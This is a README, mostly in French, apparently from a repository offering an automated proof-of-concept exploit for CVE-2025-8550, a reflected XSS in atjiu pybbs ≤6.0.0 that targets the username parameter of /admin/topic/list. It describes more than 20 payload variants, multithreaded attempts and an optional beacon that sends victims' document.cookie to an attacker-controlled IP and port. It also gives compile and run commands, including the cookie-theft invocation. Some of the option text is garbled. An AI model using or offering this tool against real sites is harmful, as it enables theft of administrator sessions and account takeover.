
XSS exploit for CVE-2025-8550 in atjiu pybbs ≤6.0.0
Ce dépôt héberge un exploit automatisé de preuve de concept (PoC) pour CVE-2025-8550, une vulnérabilité de Cross‑Site Scripting (XSS) réfléchie dans atjiu pybbs (≤ v6.0.0). Il cible le paramètre username du point de terminaison /admin/topic/list, qui manque d'une désinfection appropriée des entrées.
20+ Variations de charge utile : script, SVG, iframe, object, gestionnaires onerror et plus.
Encodage automatique des URL : assure une injection sécurisée via curl_easy_escape de libcurl.
Exfiltration de cookies (Optionnel) : injection de balise pour envoyer document.cookie à un serveur contrôlé par l'attaquant.
Multithreading : utilise pthreads pour paralléliser les tentatives et accélérer les tests.
CLI personnalisable : propulsé par argparse, prend en charge la spécification de :
-u / --url)-c / --cookies)-k / --cokpay)-i / --ip, -p / --port)-v / --verbose)# Compile the exploit binary
gcc exploit.c argparse.c -o CVE-2025-8550 -lcurl -lpthread
# Run against target
./CVE-2025-8550 -u http://<TARGET> -v [-c [COOKIE_FILE]]
#COOKIE SEND :
./CVE-2025-8550 -u http://TARGET -i <YOUR_IP> -p <YOUR_PORT> -v [VERBOSE_MODE] -k [PAYLOAD_COOKIE]
http://<TARGET> par votre instance d'atjiu pybbs.-k pour activer la balise de vol de cookies (nécessite -i et -p).-c si aucun cookie d'authentification n'est nécessaire.Licence MIT